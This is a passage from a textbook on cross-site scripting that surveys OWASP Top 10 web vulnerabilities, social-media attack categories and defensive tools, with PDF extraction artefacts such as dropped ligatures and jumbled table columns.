Terefore, to assess the top 10 most dangerous vulnerabilities
against these steps, Table 1.2 highlights the evaluations scheme of
each of the steps identifed [18].

TABLE 1.2 Evaluation Scheme of Risk Path Identifed


Vulnerability
Treat Agents Exploitation Dominance Identifcation Impact
Specifc to the Easy Rare Simple Low
Application Average Normal Moderate Medium
Context Difcult Broad Hard High
Security Flaws in Web Applications    ◾   19

It is crucial to understand any web application vulnerabilities


before a solution could be fabricated. Hence, Table 1.3 illustrates
the mapping between web application vulnerability and risk path
as per the steps shown in Table 1.2. Treat agents may be specifc
to the application context; therefore, each of the vulnerabilities
can be exploited diferently and may impose severe impacts of low
to high severity level.

1.4 TOWARD BUILDING SECURE WEB APPLICATIONS


Heretofore, we reviewed the most severe and dominant web appli-
cation vulnerabilities including the risk factors that these vul-
nerabilities can impose on any organization. In this section, we
evaluate, from a generalized perspective, each web application
and determine its measurement for identifed risk factors.
Tese vulnerabilities exist in almost every web application, and
their impact depends on the profciency of the attacker to trigger
an attack and the type of organization. It is unveiled that a small
vulnerability may be catastrophic for an organization but may not
pose a serious impact on another. Table 1.4 presents this evaluation
for identifed vulnerabilities. As the aferefects of any attack may
vary, there is a need to develop secure web applications from the
development stage itself. Tere are some stages/activities that can
be incorporated in the development cycle. Let’s discuss these stages.

• Identifcation and Management of Risk: Tis stage deals


with the detection of the risk that may be exploited in appli-
cations when they are released. Te organization utilizes
Dynamic Application Security Testing (DAST) to fgure out
the fndings that help in creating and monitoring the risk
metrics. Tese metrics assist in risk analysis, so that reme-
diation solutions can be prioritized.
• Secure Patch Release Assurance: Amendment is an ongo-
ing activity; every application must be updated with time.
20 ◾ Cross-Site Scripting Attacks

TABLE 1.3 Mapping of Web Application Vulnerabilities with Risk Path


Vulnerability:
Top Dominance and
10 Exploitation Identifcation Impacts
V1. Injection faw, for instance, Injection vulnerability It results in the loss of
SQL injection, LDAP dominates in all kinds confdentiality and
injection, and OS of web application.An integrity. It may shut
injection, is the result of injection may occur down the entire
the insertion of malicious in the form of SQL, system, leading to
data into the web LDAP, NoSQL, XPath, denial of access and
application via any input XML parsers, object control hijacking.
feld like post, comment, relational mapping Business-related
form felds, etc. Any data queries, etc. It can be impacts depend upon
can behave as malicious easily identifed the context of the
attack vector may be through the use of application and data
environment variables, scanners and code used.
URL parameters, etc. examination.
V2. Attackers bypass the Tis attack is Te attacker gains
authentication method ubiquitous due to the control of the user
by utilizing various implementation of account or get the
techniques like identity validation entire system control,
dictionary-based attack, and access control. if admin is compro-
brute force for mapping Te attacker can mised. On the basis of
ID and password, and easily detect this the context of the
so on. vulnerability application, it may be
manually and utilize social identity clone,
automatic mecha- breach of user privacy,
nisms to exploit it. or fnancial fraud.
V3. Deciphering is a complex Tis vulnerability Tis attack completely
task to achieve. exists either because compromises the
Terefore, an attacker of no usage of crypto individual’s privacy,
performs attacks to system or weak which includes
steal secret keys or mechanism used for sensitive data like
performs passive secret key generation credit card number,
attacks like and encryption. It is health-related
eavesdropping and easy to detect information, and any
man-in-middle attack server-side information which
to steal sensitive vulnerability when must be kept in
information. data is in transit; secret from a person’s
however, it is difcult perspective.
to do when at rest.
(Continued)
Security Flaws in Web Applications    ◾   21

TABLE 1.3 (CONTINUED) Mapping of Web Application Vulnerabilities


with Risk Path
Vulnerability:
Top Dominance and
10 Exploitation Identifcation Impacts
V4. Te attacker can exploit During XML Te attack results in
this vulnerability by processing, many the remote access of
either using abused older XML parsers the system, data
XML parser or inserting require to specify disclosure, port
some malicious data the origin of the scanning, and DoS
into the XML document external references. attack. Its severity
exploiting vulnerable Source code may vary as per the
code or any dependency analysis is done to application context
on external references. identify this depending upon the
vulnerability by privacy requirement.
checking for any
dependencies or
integration. Many
automated tools are
also used to find
out the
vulnerability
existence in the web
application.
V5. Te attacker can utilize Tis vulnerability is Te attacker
static or dynamic commonly found impersonates as a
application testing to due to the faw in legitimate user
search to fgure out the functional gaining access to its
whether access control testing and data and may cause
policies are enforced inefective access modifcation or
properly or not. It is the control policy destroy data, i.e.
hardcore task of the regulation. Along masquerade attack.
attacker to gain with static and Its severity may vary
unauthorized access. dynamic testing, as per the application
manual testing is an context depending
efective approach upon the privacy
to detect inefective requirement.
access control.
(Continued)
22 ◾ Cross-Site Scripting Attacks

TABLE 1.3 (CONTINUED) Mapping of Web Application Vulnerabilities


with Risk Path
Vulnerability:
Top Dominance and
10 Exploitation Identifcation Impacts
V6. Te attacker identifes Tis vulnerability is Tis vulnerability
the default insecure commonly found at allows the attacker to
confguration like any level in the gain access to the
unpatched errors, application like data in an
accounts with default database, unauthorized way or
confguration, and networking services, sometimes gaining
insecure fles to gain web server, storage, control of the entire
control of the system. and application system. Te severity
server. It can be level depends on the
recognized easily level of security
with the help of requirement in the
automated scanners application context.
for scanning
insecure
confgurations, use
of accounts with
default
confgurations, etc.
V7. Te attacker may utilize Almost one-third of XSS attack results in
freely available web applications are account hijacking,
framework or tools to vulnerable to this phishing, disclosure
detect XSS vulnerability attack. Tey can be of data, misuse of
in the web application. detected with the personal information,
help of automated etc.
scanners.
V8. Tis attack is difcult to As it is not prevalent Tis attack may result
trigger; the attacker so far, its detection in the remote code
may alter some of the requires human execution which
parameters that result intervention; leads to system
in the redirection to the however, some tools control or system
object for which the are there to detect crash.
attacker is not insecure
authorized to use. deserialization.
(Continued)
Security Flaws in Web Applications    ◾   23

TABLE 1.3 (CONTINUED) Mapping of Web Application Vulnerabilities


with Risk Path
Vulnerability:
Top Dominance and
10 Exploitation Identifcation Impacts
V9. Te attacker can easily Applications with Depending upon the
fnd an exploit for the more third-party context of application
known vulnerability. components’ usage this attack may cause
Tere is a need to without proper severe harm
perform some tasks for validation are more including the loss of
the checking of new infected with this data and personal
vulnerability. attack. Automate information.
scanners aid in
identifying, but new
exploitation may
require eforts.
V10. Tis vulnerability sets One way to detect this Te attacker is capable
the foundation for a faw is by the careful enough to launch
large number of attacks. monitoring of the some large attacks
Te attacker takes events along with and extract or
advantage of penetration testing. destroy data, as the
insufcient logging and All the results must lack of monitoring is
lack in networking- be logged properly a plus point for the
related activities to to realize the attacker.
achieve their motive. damages. It takes a
longer time to detect.

Terefore, this stage ensures that any newly released com-


ponent/patch of application is secure; i.e. it will not add
new vulnerability and risk path to the current secure ver-
sion of the application. Te organization employs Static and
Dynamic Application Security Testing (SAST and DAST) to
achieve the main motto of this stage. It has also been assured
that the remediation solutions implemented by the organi-
zation are successful in restricting the risk.
• Empowering Application Developers: Tis activity sup-
ports the organization through a reduction in the number of
24 ◾ Cross-Site Scripting Attacks

TABLE 1.4 Evaluation of Web Application Vulnerabilities against Risk


Factors
Risk Vulnerability Abuse

Vulnerability Exploitation Dominance Identifcation Impacts


V1 Easy Normal Simple High
V2 Easy Normal Moderate High
V3 Average Broad Moderate High
V4 Average Normal Simple High
V5 Average Normal Moderate High
V6 Easy Brad Simple Medium
V7 Easy Broad Simple Medium
V8 Difcult Normal Moderate High
V9 Average Broad Moderate Medium
V10 Average Broad Hard Medium

vulnerabilities that may arise due to the negligence of secure


coding by the developers. Under this, the organization pro-
vides training on application security tools to the developers
so that security issues can be detected and removed before
they go unnoticed in any version release. Training sessions
may be conducted depending upon the risk identifed in
applications and released patches. For this a questionnaire
survey may be conducted by the security experts within the
organization.

1.5 CHAPTER SUMMARY


Every business domain depends on the internet for expanding
its business boundaries. Tis has led to the emergence of a large
number of web applications available on the internet. Security
is no longer optional while developing the application. Insecure
development raises various security challenges. Terefore, the
focus of this chapter has been to elaborate on the most dominant
web application vulnerabilities. It has shown various statistics
unveiled by diferent pioneer security organizations. Tis chapter
Security Flaws in Web Applications    ◾   25

provided a comprehensive overview of the top 10 most harmful


vulnerabilities that are more dominant and are being exploited
every year despite deploying defensive solutions. It inferred that
there are some security loopholes in web applications which pres-
ent new risk paths. Furthermore, this chapter described each of
the vulnerabilities against these risk paths. Precautions are better
than cure; therefore, the execution of security aspects during the
development phase perhaps helps organizations to understand the
current scenario and a course toward improvement.

REFERENCES
1. Apache Sofware Foundation. (2019) Apache web server. [online]
Available at: https://httpd.apache.org/docs/2.4/howto/.
2. Babiker, M., Karaarslan, E., & Hoscan, Y. (2018, March). Web
application attack detection and forensics: A survey. In 2018 6th
International Symposium on Digital Forensic and Security (ISDFS)
(pp. 1–6). IEEE.
3. Brunil, D., Romero, M., Haddad, H. M., & Molero, A. E. (2009).
A methodological tool for asset identifcation in web applications.
In IEEE Fourth International Conference on Sofware Engineering
Advances (pp. 413–418).
4. Chaudhary, P., & Gupta, B. B. (2018). Plague of cross-site script-
ing on web applications: A review, taxonomy and challenges.
International Journal of Web Based Communities, 14(1), 64–93.
5. Gupta, B., Agrawal, D. P., & Yamaguchi, S. (eds.). (2016). Handbook
of Research on Modern Cryptographic Solutions for Computer and
Cyber Security. IGI Global.
6. Gupta, B. B. (ed.). (2018). Computer and Cyber Security. Principles,
Algorithm, Applications, and Perspectives. CRC Press.
7. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the
browser-side context-aware sanitization of suspicious HTML5
code for halting the DOM-based XSS vulnerabilities in cloud.
International Journal of Cloud Applications and Computing
(IJCAC), 7(1), 1–31.
8. Gupta, B. B., Gupta, S., Gangwar, S., Kumar, M., & Meena, P. K.
(2015). Cross-site scripting (XSS) abuse and defense: Exploitation
on several testing bed environments and its defense. Journal of
Information Privacy and Security, 11(2), 118–136.
26 ◾ Cross-Site Scripting Attacks

9. Gupta, B. B., & Sheng, Q. Z. (eds.). (2019). Machine Learning for


Computer and Cyber Security: Principle, Algorithms, and Practices.
CRC Press.
10. Gupta, S., & Gupta, B. B. (2015). BDS: Browser dependent XSS sani-
tizer. In Handbook of Research on Securing Cloud-Based Databases
with Biometric Applications (pp. 174–191). IGI Global.
11. Gupta, S., & Gupta, B. B. (2015, May). PHP-sensor: A prototype
method to discover workfow violation and XSS vulnerabili-
ties in PHP web applications. In Proceedings of the 12th ACM
International Conference on Computing Frontiers (p. 59). ACM.
12. Gupta, S., & Gupta, B. B. (2016). Enhanced XSS defensive frame-
work for web applications deployed in the virtual machines of cloud
computing environment. Procedia Technology, 24, 1595–1602.
13. Gupta, S., & Gupta, B. B. (2016). JS‐SAN: Defense mechanism for
HTML5‐based web applications against JavaScript code injec-
tion vulnerabilities. Security and Communication Networks, 9(11),
1477–1495.
14. Gupta, S., & Gupta, B. B. (2016). XSS-SAFE: A server-side
approach to detect and mitigate cross-site scripting (XSS) attacks
in JavaScript code. Arabian Journal for Science and Engineering,
41(3), 897–920.
15. Lawton, G. (2007). Web 2.0 creates security challenges. IEEE
Computer Society, 40(10), 13–16.
16. McClure, S., Shah, S., & Shah, S. (2017). Web Hacking: Attacks and
Defense. Addison-Wesley Professional.
17. Microsof IIS web server. [online] Available at: https://stackify.
com/iis-web-server/.
18. OWASP. OWASP Top 10 2017: Te ten most critical web applica-
tion security risks. [online] Available at: https://www.owasp.org/
images/b/b0/OWASP_Top_10_2017_RC2_Final.pdf.
19. Seth, F., Jeremiah, G., Robert, H., Anton, R., & Petko, D. P. (2011).
XSS Attacks: Cross Site Scripting Exploits and Defense. Elsevier.
20. Toch, E., Bettini, C., Shmueli, E., Radaelli, L., Lanzi, A., Riboni,
D., & Lepri, B. (2018). The privacy implications of cyber secu-
rity systems: A technological survey. ACM Computing Surveys,
51(2), 36.
21. Web application vulnerability statistics report [online]. Available at:
https://www.ptsecurity.com/upload/corporate/ww-en/analytics/
Web-Vulnerabilities-2017-eng.pdf.
Security Flaws in Web Applications    ◾   27

22. Web application vulnerability statistics report. (2018). [online]


Available at: https://www.ptsecurity.com/upload/corporate/w
w-en/analytics/Web-Vulnerabilities-2018-eng.pdf.
23. White hat security report. [online] Available at: https://info.wh
itehatsec.com/rs/675-YBI-674/images/WHS%202017%20Applic
ation%20Security%20Report%20FINAL.pdf.
CHAPTER 2

Security Challenges
in Social Networking
Taxonomy and Statistics

T his chapter describes the facts behind numerous forms


of attacks triggered by threat agents through exploiting vul-
nerabilities which has been discussed in Chapter 1. Tis chap-
ter primarily focuses on the most popular and highly used web
application on the internet, i.e. Online Social Networking (OSN)
sites. Firstly, we discuss the related statistics on the popularity of
social media and the attack incidences on it. Moreover, we have
bifurcated social media attacks into major categories. Finally, we
spend some time to bring into light the major contributions or
approaches that have been proposed by researchers to provide
security to users on social media.

2.1 INTRODUCTION
Although social media has emerged within a short span of time, it
has attracted millions of internet users and has become the most
29
30 ◾ Cross-Site Scripting Attacks

popular use for the internet globally. With the development of the
web as a content-based platform, social media is the only digital place
which revolves around user-generated information. Te Online
Social Network (OSN) has emerged as a logical location for the bil-
lions of its users. Here they can expand their relationship bound-
aries across the globe [4, 36]. It facilitates socialization by enabling
new links with loved ones or restoring vanished ones. Moreover,
this platform can be employed by diferent organizations as a digi-
tal platform to enlarge their business through advertising and for
entertainment purposes, education, and so on. Te most prominent
services provided by OSN are illustrated in Figure 2.1.

2.1.1 Statistics of Social Networking


Recent years have shown a remarkable growth in OSNs, which
collect information from over more than half a billion regis-
tered users as shown. It has been refected in Figure 2.2 that OSN
engaged almost 80 percent of active internet users, where they
share their day-to-day information in the form of posts, statuses,
videos, photos, and so on [27].
Over a decade, social media platforms such as Facebook and
Twitter have attracted a large portion of the world’s population by

FIGURE 2.1 Prominent services of OSN.


Security Challenges in Social Networking    ◾   31

FIGURE 2.2 Popularity of OSN among internet users.

providing services such as personal account maintenance, com-


munication with one another, and discovering the profle of other
persons having similar interests, behaviors, or nature. Figure 2.3
highlights statistics related to the number of users grabbed by dif-
ferent social media platforms [30].
It has been observed in a report by Pew Research Center in 2018
[27] that a major portion of the population in America is addicted
to Facebook and YouTube, whereas the majority of the adults are
using Snapchat and Instagram. Te usage and popularity of dif-
ferent social media platforms depend heavily on the age factor
and the major proportion of the population. Figure 2.4 refects
the related statistics unveiled by the same report that the teenager
percentage of OSN usage is 88%; however, it is 78% among adults
who are spending their leisure time over OSN to be connected
with the world.

2.1.2 Recent Incidences on Social Networking Platform


It has been pointed out that the increasing popularity of OSN-
based web sites is being utilized by the attacker to harm more num-
ber of online active users. Characteristics of OSN for becoming
32 ◾ Cross-Site Scripting Attacks

FIGURE 2.3 Number of users engaged by diferent social media platforms.


Security Challenges in Social Networking    ◾   33

FIGURE 2.4 Percentage of users by age group by Pew Research Center.

the main focus for attackers are: (1) the high concentration of its
topology, (2) the use of enhanced and advanced web development
technologies like AJAX and JavaScript for more interactive appli-
cations, and (3) a stronger trust relationship among nodes than in
general networks. Figure 2.5 shows the number of vulnerabilities
identifed on some of the social media platforms.
Tese hidden vulnerabilities not only afect the usage and
popularity of social media but also afect the user’s privacy and
security. Recently, in 2017, hackers attacked one of the highly used

FIGURE 2.5 Total number of vulnerabilities detected on social media


platforms.
34 ◾ Cross-Site Scripting Attacks

social platforms, Facebook. It has been reported [16] that almost


50 million users’ accounts were compromised because of the seri-
ous vulnerability detected in the site. Users’ sensitive information
was leaked, and various unusual activities were performed. Tis
was the severe case as the attackers stole the “access token” which
helped the attacker to remain logged on to Facebook in multiple
sessions and there was no need to enter the password. Twitter had
also discovered vulnerability in its support system in November
2018. Tis led to the leakage of its users’ data. Specifcally, the
attackers identifed a faw that helped in getting the geographical
location of the user. Figure 2.6 presents some of the vulnerabilities
recognized on Twitter platform.

FIGURE 2.6 Vulnerabilities detected on Twitter platform.


Security Challenges in Social Networking    ◾   35

Millions of users of Instagram were hacked in 2018. Hackers


made all of the infected users to get logged out of their accounts
and changed their details like user name, email address, profle
picture, and other details. Users were unable to login again into
their respective accounts. Tis issue has afected the popularity of
Instagram and somehow afected the number of active users on
Instagram. In 2019 [33], bufer overfow vulnerability (CVE-2019-
3568) was found on WhatsApp, which is a highly utilized social
media platform with approximately 1.5 billion active users on a
daily basis. It has also been infected by Spyware, which exploits
the WhatsApp calling function. Tis leads to the leakage of sen-
sitive data residing in the user. Multiple malware families are
infecting social media nowadays and are the major reason behind
the data breach on social media. Tere are multiple families of the
malware that have been identifed on social media as shown in
Figure 2.7.

2.2 DISTINCT ATTACK CLASSES OF


SOCIAL PLATFORM
Tere are plenty of attacks that are triggered by diferent hackers’
communities or attackers on the digital platform of social media.
Social media facilitates social relationship across the globe. Its
usage has been increased to an extent that it imposes serious
threats related to the security and privacy of the user. Social
media attacks have been classifed into regular attacks, contem-
porary attacks, and specifc attacks that are particular to social
media. Figure 2.8 shows the diferent classes of attacks on social
media [8, 28, 29].
Table 2.1 describes each of these attacks briefy. Regular attacks
are a major concern and have been in limelight since the develop-
ment of the internet. It includes phishing, spamming, malware,
XSS attack, and many more [9, 10, 13, 14, 15, 18]. Contemporary
attacks are modern attacks triggered by the attacker on social
media like de-anonymization attack, identity clone attack,
36 ◾ Cross-Site Scripting Attacks

FIGURE 2.7 Malware families identifed on social media (%).


Security Challenges in Social Networking    ◾   37

FIGURE 2.8 Classes of social media attacks.

inference attack, and so on. Specifc attacks include attacks spe-


cifc to the social networking platform such as cyber stalking,
online exploitation, cyber bullying, and so on. Tere are numer-
ous attacks triggered by the attacker using hidden vulnerabilities.
Social media is the most attractive platform to launch and eas-
ily disseminate various malwares and attacks. It always remains
a trade-of between the advanced features provided and keeping
the security and privacy of the users high.

2.3 SOCIAL NETWORK DESIGN VS.


PRIVACY AND SECURITY GOALS
In this section, we will discuss the architecture of the social net-
work. Social media is a highly diverse and sophisticated platform
allowing users to remain socially active. Social network utilizes
38 ◾ Cross-Site Scripting Attacks

TABLE 2.1 Description of Social Media Attacks


S.R. No. Attack Explanation
Regular Attacks
1. Phishing Tis attack exploits the trust of the user over any
[2, 32] web application on the internet. It creates the
similar trustworthy interface and environment to
lure the victim to enter his sensitive credentials like
user ID, passwords, credit/debit card information,
and many more. Users on social media are more
likely to fall for this attack as the attacker
masquerades to be a trusted friend of the victim.
2. Malware [35] Tese are the illicit computer programs that are
developed with an intent to steal the user’s sensitive
information, to gain remote access to the victim’s
machine, to completely destroy the machine, or to
perform some malicious activity. Te diferent
malware categories include viruses, worms, Trojan
horses, backdoors, spyware, adware, etc. It is an
easy platform for an attacker to propagate malware
to infect more users via social media by exploiting
the social relationship of the user.
3. Spamming [34] It means sending bogus messages in large quantity
to the victim. In case of social media, spammers
create fake accounts to spread fake news or
messages. Tey spread unwanted advertisements
or comments on the pages which are highly
viewed by the users of social media. Facebook
and YouTube are the highly exploited platforms
for spamming.
4. Clickjacking [29] It is an attack where victims are persuaded to click
a link which is used by the attacker to hide the
malicious content. Actually, the users are
befooled to click on the link which seems to be
trustworthy but is actually not. Te attackers use
this technique to spread spam messages or to
steal money from the account. For example,
Twitter had been infected by Clickjacking attack,
in 2009, through the spreading of “Don’t Click”
messages with a URL. Users got infected by
clicking on this link, and this message went viral.
(Continued )
Security Challenges in Social Networking    ◾   39

TABLE 2.1 (CONTINUED) Description of Social Media Attacks


S.R. No. Attack Explanation
5. De-anonymization Anonymization is the method to hide the real
[21] identity of the user with pseudonyms. So the
attacker uses the de-anonymization attack for
revealing the original identity of the user. Te
attacker utilizes information such as network
topology, group membership information, tracking
cookie information, and so on. Social media is the
main target to perform this attack as the attacker
or the third party may reveal the original identity
through examining available information.
6. Inference Attack In this attack, the attacker infers the private
[5] information of the user through mining the
information available publicly on social media such
as information related to the social relationship of
the user, data revealed by the user’s friend, etc.
7. Social Bots [7] Basically, these are the fake profles developed by the
attacker, maybe automatic or semi-automatic, and
behave similar to the human while performing
activities on social media. Social bots send friend
request to the user, and on acceptance, they may
start gathering private information of the user.
Consequently, the user’s privacy gets violated.
8. Cross-Site A code injection vulnerability in which the attacker
Scripting [6] injects malicious script into the web page.
Whenever the user visits that web page, the script
gets executed by the web browser and the attacker
gets the user’s sensitive credentials like session
token, cookie information, ID and password, and
other information. Various attack vectors are used
by the attacker such as JavaScript attack vectors,
CSS, HTML tags attack vectors, and so many.
Contemporary Attacks
9. Identity Clone In this attack, the attacker duplicates the user’s profle
Attack [19] on either the same social platform or other platform.
It helps in gaining personal information of the
cloned user’s friend. Te attacker may perform
malicious activities in disguise of the victim such as
cyber stalking, online exploitation, etc.
(Continued )
40 ◾ Cross-Site Scripting Attacks

TABLE 2.1 (CONTINUED) Description of Social Media Attacks


S.R. No. Attack Explanation
10. Socware [8] It is a type of malware which is used to spread
fake messages by using the victim’s profle. Te
victim is tempted to install socware embedded
applications by ofering some rewards to them.
Ten, it sends messages to the victim’s friends,
aiding in propagation and message
dissemination.
11. Location Leakage Social media users frequently post various
[22] pictures, revealing their location information to
the malicious users. Te attacker uses this
information to stalk the victim physically,
which may be dangerous to the user. Smart
phone usage is the main cause of this type of
breaches.
12. Spear Phishing It is one of a kind of phishing attack, but it
[3, 17] targets an individual, an organization, or a
business. The victim gets the spam messages
that seem to come from a specific source
instead of a generalized source as in the case of
phishing attack. The victim may be redirected
to the attacker’s site to steal private
information or to gain the organization’s
network access.
13. Sybil Attack [1] In this attack, the attacker creates multiple fake
accounts on social media to infuence a large
number of users that help in gaining access to
confdential information.
14. Information Information sharing is one of the dominant
Leakage features of social media. Users share their
personal as well as professional information
digitally. Tis may somehow violate their
privacy as a third party like an insurance
company may use this data about its clients to
increase their premiums or to deny their
payments afer knowing their health status. Te
attackers may also use this information to hurt
the user.
(Continued )
Security Challenges in Social Networking    ◾   41

TABLE 2.1 (CONTINUED) Description of Social Media Attacks


S.R. No. Attack Explanation
15. Privacy Breach Privacy of social media depends not only on the
through Tagging sharing of data by the user but also on the
[24] friend’s activity. Your identity may get revealed if
someone in your friends list tags you in his
uploaded photographs. It is a much-concerned
issue faced by the users of social media
nowadays. Some social media platforms provide
privileges to their users to add more information
along with tagging. Tis will add on to the
privacy breach issues of the users.
16. Treats from Social platforms allow a user to share data
Multimedia including multimedia contents such as photos and
Data videos of good quality. Terefore, malicious users
may easily get information like the location of the
victim, recognition through face, and so on. Tis
may bring potential damage to the victim.
Specifc Attacks
17. Online Exploita- It is the highly concerned matter over the usage of
tion [26] social media. Online exploitation means
harassing someone digitally either through
delivering harmful content such as pornography
and some sexual content to the victim or through
making connections with young children to
sexually exploit them. In this, the malicious users
may target minors as they are highly prone to
such activities due to their age and less
understanding of things.
18. Cyber Stalking Cyber stalking means to follow someone on a
[23] digital platform with harmful intentions. Te
attackers may utilize the information disclosed
by the victim on social media such as address,
phone number, email ID, DOB, and other
information available through the friends of the
victim. Users frequently post their status
including images and videos, revealing the
location information to the stalker who may
perform dangerous attacks. Tis might cause
mental imbalance or depression to the victim.
(Continued )
42 ◾ Cross-Site Scripting Attacks

TABLE 2.1 (CONTINUED) Description of Social Media Attacks


S.R. No. Attack Explanation
19. Corporate It means keeping an eye over the employee of the
Espionage organization to get sensitive information. It helps
in performing social engineering attacks on
social media. It may be performed to harm either
the employee or the organization by revealing
confdential information through employee.
20. Cyber Bullying It means causing harm to anyone intentionally
[31] through sending unwanted messages, revealing
personal pictures publicly, sexual comments, or
involving in some harmful activity. Social media
is a highly used platform for such activities as the
attacker can easily spread fake news about the
victim using links and network topology of the
social network.

either of the two architectures, namely client-server architecture


or P2P (peer-to-peer) architecture. Let us discuss each briefy:

• Client-Server Architecture: Tis infrastructure uses a central-


ized server to provide diferent services to the user like stor-
age and maintenance, but it becomes a single point of failure.
Diferent social media features are facilitated by diferent pro-
viders like Facebook, Twitter, and so on. However, to overcome
the limitations of this type of architecture, researchers have
designed decentralized architecture for the social network.
• P2P Architecture: In this architecture, the role of the central
server is distributed to each storage node and supports the
direct exchange of information between nodes. Here, pri-
vacy is more but global search in a distributed manner is a
challenging task.

Tere are three main pillars of network security: confdentiality,


integrity, and availability (CIA) [11, 12, 20, 25]. When we are talk-
ing in the context of social media, each one of them may have
Security Challenges in Social Networking    ◾   43

many perspectives. First, we will have a small glance on what


these diferent perspectives are.

• Confdentiality or Privacy: It is highly desirable in social


media to protect the unauthorized disclosure of sensitive
information related to its users. Privacy of the user depends
on the user’s perspective. It may have diferent scenarios
according to the type of the social platform the user is using
such as: (a) by using pseudonyms to hide the real identity
of the user on social media like dating platforms but not on
professional networks like LinkedIn, (b) by applying privacy
settings on the profle to restrict visibility to only friends,
but keeping it public if using matrimonial sites, and (c) by
obtaining the consent of the user before using his sensitive
information even by the social network service provider. It
requires more focus on the access control and anonymity
methods.
• Integrity: Integrity in terms of social networking may be
viewed as keeping the consistency between real-life social
relationship and online social relationship. Te attacker may
disrupt this consistency via two ways: frst, through cloning
the identity of a legitimate user; second, through creating
many fake identities to harm the reputation system of social
media. Integrity requires the proper authentication of users.
• Availability: It means information shared or posted by the
user must be available to the user at the time of its demand.
Other security features like accountability must be assured
by the social media service provider.

Social media is popular among the internet users because of its


services like sociability. However, the design goals are in confict
with the security and privacy of the social users. Now, we will look
into what these conficts are, in brief.
44 ◾ Cross-Site Scripting Attacks

(a) Enhanced Searching Capabilities vs. Privacy: Digital space


exploring is the main feature of OSN to facilitate socializa-
tion. For social search, more personal data of the user must
be disclosed in order to give more efcient and accurate
result, but this violates the security and privacy rules of
OSN. So there is a trade-of between search capabilities and
privacy. More efcient security mechanism means a higher
likelihood of privacy breaches. For social traversal, privacy
of user data also gets afected by the public display of social
connections. Social contact information can be used by
adversaries to infer the more sensitive and private data of the
user. For example, “A” has encrypted his profle and is acces-
sible only to his friends while his friends list is publicly open
to facilitate social traversal. Te attackers can infer common
traits from A’s friends list like his age, occupation, and so on.
(b) Privacy vs. Social Connection: Te main functionality of
OSN is to provide easy methods for social interactions. But,
if this is done in an uncontrollable manner, then it may lead
to the violation of user privacy. Suppose you have hidden
your identity publicly by using an anonymous identifer but
your friend has uploaded a picture with you and tagged you
with your real name and also commented on you related
to your designation, then unknowingly your friend has
revealed your identity and occupation publicly.
(c) Privacy vs. Data Mining: OSN stores a huge amount of data
of approximately half a billion registered users in its data-
base. Tis information can be used for social and marketing
analysis. It can also be used to optimize OSN services and
customize them with respect to the user’s interests. Tis way
the attacker may intrude on the privacy of OSN and may
recover most users’ identities. So there is a trade-of between
the quality of the result of data mining and privacy require-
ments of OSN’s users.
Security Challenges in Social Networking    ◾   45

(d) Architectural Conficts: Client-server architecture of social


network is more advantageous over P2P model in satisfying
most of the design goals of social media. It supports easy
social space exploration, and users can easily fnd their lost
social connection as data of all users is centrally stored. But
it becomes the single point of failure and attracts the hack-
ers. So P2P architecture has strengthened the privacy of the
user by distributing the user’s information on the user nodes
itself which also enforces the privacy rules and can encrypt
the data.

2.4 SOLUTIONS TO PREVENT AGAINST


SOCIAL MEDIA ATTACKS
In this section, we provide a comprehensive overview of the
solutions available to prevent attacks on social media. As it is a
fascinating platform for various kinds of attacks, it attracts the
attention of many researchers, social media operators, and com-
mercial security developers to design preventing solutions against
the mentioned attacks. Table 2.2 highlights the social network
service provider solutions and commercial solutions [8, 28]. We
highlight the most efective solutions, but all these require the
user’s awareness in the background. Te user is the owner of his
information, and to keep his privacy, he must possess the knowl-
edge about what to share, whom to share, and where to share his
private information.

2.5 CHAPTER SUMMARY


Tinking about social media means digital gathering with friends,
family members, and working professionals and/or expanding
social relations all around the globe. Social media has become an
indispensable part of daily internet users. It not only attracts bil-
lions of people because of its unique features and services pro-
vided to the user but is also an attractive target for most of the
attackers and online fraudsters due to the information available
46 ◾ Cross-Site Scripting Attacks

TABLE 2.2 Diferent Techniques to Prevent against Social Media Attacks


S. R.
No. Solution Description
Social Media Service Provider Solutions
1. Embedded Many social media provide inbuilt security features to
Protection protect against multiple attacks, for example, Facebook
Techniques Immune System (FIS) to detect spam on Facebook.
2. Notifcation to Social media service providers can notify the users,
User mainly young children, in an attempt to protect
them from harassment on the network; for example,
Facebook uses “panic button” for this purpose.
3. Enhanced Social networks provide customizable security settings
Security and which the user can adjust according to the level of
Privacy privacy needed. For instance, a user may set his
Settings profle to be disclosed only to his friends. Google+
provides this feature through creating diferent circles
as per the nature of members included.
4. Advanced In order to insure the authenticity of the social user,
Authentication many social media platforms introduce advanced
Methods authentication mechanisms such as 2-factor
authentication, use of CAPTCHA during logging in
to protect against social bots, and so on. Tese
methods also prevent against account hijacking and
the use of the account for malicious purposes.
5. Improved User Many solutions have been designed for maintaining the
Interfaces for security and privacy of the user. Better protection can
Privacy be achieved if the user knows about the information
Settings that is available publicly to other users of the social
network. Terefore, the user interface can be upgraded
to see the information accessible to anyone so that the
user can apply security settings properly.
Commercial Solutions
6. Network Many organizations like AVG, Cisco, McAfee,
Security Kaspersky, and Norton provide many security
Solutions solutions to protect against various attacks like
identity thef, malware injection, and bot creation.
Many solutions are developed like Cisco Identity
Services Engine to authenticate the user before
using internet services, antiviruses, frewalls, email
security, Cisco next-generation IDS, and so on.
(Continued)
Security Challenges in Social Networking    ◾   47

TABLE 2.2 (CONTINUED) Diferent Techniques to Prevent against Social


Media Attacks
S. R.
No. Solution Description
7. AVG PrivacyFix It is basically a mobile app or browser extension to
confgure the user’s privacy settings. It also restricts
online tracking of the user.
8. LogDog It is a mobile intrusion detection system which
Security prevents the user’s data from being accessed
illegally. It prevents unauthorized access by using
the user’s previous activity logs. Currently, it is
developed for Android and iOS.
9. Minor Monitor Online harassment of children is frequent on social
media. Terefore, minor monitor is a service
provided to the parents so that they can examine
the activities of their children on social media such
as their friends list and content delivered to them
by other users of the network.
10. Defensio It helps in preventing against spam messages and
installing of the malwares. It is a web service that
also protects data from leakage.
11. NoScript It is a Firefox extension that allows executable scripts
Security Suite like JavaScript to get executed in the browser from
only a trusted domain. It protects against XSS
attack and many more.
12. Privacy Badger It is developed by Electronic Frontier Foundation to
protect against adware on social media. It also
protects against cookie tracking done by
advertisement on social network without the
consent of the social user. It executes as the
browser’s extension.
13. uBlock Origin It is an open-source, platform-independent browser
extension that helps in fltering the content as per
the preferences of the user.
14. ZoneAlarm It is a chrome extension that protects social network
